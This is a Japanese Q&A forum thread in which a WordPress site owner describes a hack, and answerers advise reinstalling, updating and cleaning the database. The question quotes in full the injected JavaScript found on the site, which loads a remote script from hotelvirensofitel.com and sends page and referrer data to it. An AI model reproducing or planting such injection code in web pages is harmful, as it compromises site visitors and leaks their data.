Q&A
kei344さん、
アドバイスありがとうございます!
セキュリティソフト是非検討します。
「全ファイルの削除だけでなく、DB内のデータ削除」とは、「WordPress内の」ということでしょうか?再インストールはしてみたいとおもっておりますが、もしよろしければもう少し詳しめにお教え頂けますととてもうれしいです。
###前提・問題
WordPressサイトを、Mesocolumnというテンプレで作っておりましたが、
ある日、top画面がまっしろに表示がされました。
###試したこと
1. wp-config.phpのDEBUGモードをfalseからtrueにして、エラーを確認したところ、
直前で入れていたfavicon rotatorが問題であったようだったので、
プラグインを停止したところ、画面は表示されるようになりました。
(※今ではどういうメッセージが出ていたのか、わからないのですが…)
2.そうしたところ、「wp-content/db.php」の一行目にエラーが発生しているというメッセージが出たため、
wp-content直下にあったdb.phpを見てみると、1行目は、「<?php」のみでした。
3.インターネットでdb.phpのエラーを検索すると、ファイル自体を削除することで解決している人がいたため
db.phpの名前をdb_old.phpにサーバー上で変更
4.TOPページにはエラーが表示されなくなりましたが、管理画面側でちょいちょいエラーが出るようになってしまったので初心者的にはWordPressを再インストールした方がよいかと思い、週末を待っておりました。
5.昨晩、該当URLにアクセスすると、ブラウザ左下に「hotelvirensofitel.comを待機しています…」というメッセージが出ていることに気が付きました。デベロッパーツールで確認をすると、javascriptが書き込まれていることに気が付きました(発生している問題・エラーメッセージに書きました)
6.今朝、該当URLにアクセスすると、以下の画像が表示されました。
以上が、実施してみたことになりますが、WordPressを再インストールすればよい話なのか、もはやそれだけではない問題なのか、そもそもどうしてこうなったのか(どうするべきであったのか)、ご教示頂ければ幸いです。
###発生している問題・エラーメッセージ
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://hotelvirensofitel.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
###補足情報
ちなみに当方はMac歴1ヶ月程度。友人には、MacはこまめにPCの再起動を行えば、再起動時に悪意のあるマルウェアなどは削除する仕様…と言われたので、ウィルス対策ソフトなどは入れておりません。
回答2件
0
ベストアンサー
現物を見ていないので確定的なことはいえませんが、WordPressが改ざんされた危険性があります。
日ごとに状況が変わっているということは、すでに誰かがあなたのWordPressで好き放題できるルートを作っている可能性も高いので、一度完全に新しいWordPressを入れることをおすすめします。
なお、WordPressへの侵入は多くの場合、WordPress自体やプラグインの脆弱性を使って行われるので、「パソコンにウイルス対策ソフトを入れた」ところで、まったく防御にはなりません。WordPressをこまめにアップデートする、というのが適切な方法です。
投稿2016/12/03 01:07
総合スコア145183
0
MacはこまめにPCの再起動を行えば、再起動時に悪意のあるマルウェアなどは削除する仕様
10年以上仕事でMacをさわっていますが、上記のようなことは聞いた事がありません。セキュリティソフト自体そこまで高価でもないので、導入されることをお勧めします。
また、全ファイルの削除だけでなく、DB内のデータの削除及びDBのパスワード変更などもされたほうが良いです。
投稿2016/12/03 02:35
総合スコア69400
「WordPress内の」が具体的に何を指しているかはわかりませんが、「WordPressがDBにアクセスするためのID/Passで入れるDB」のテーブル全てについて、書き換えられていない保障がありません。
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2016/12/03 02:26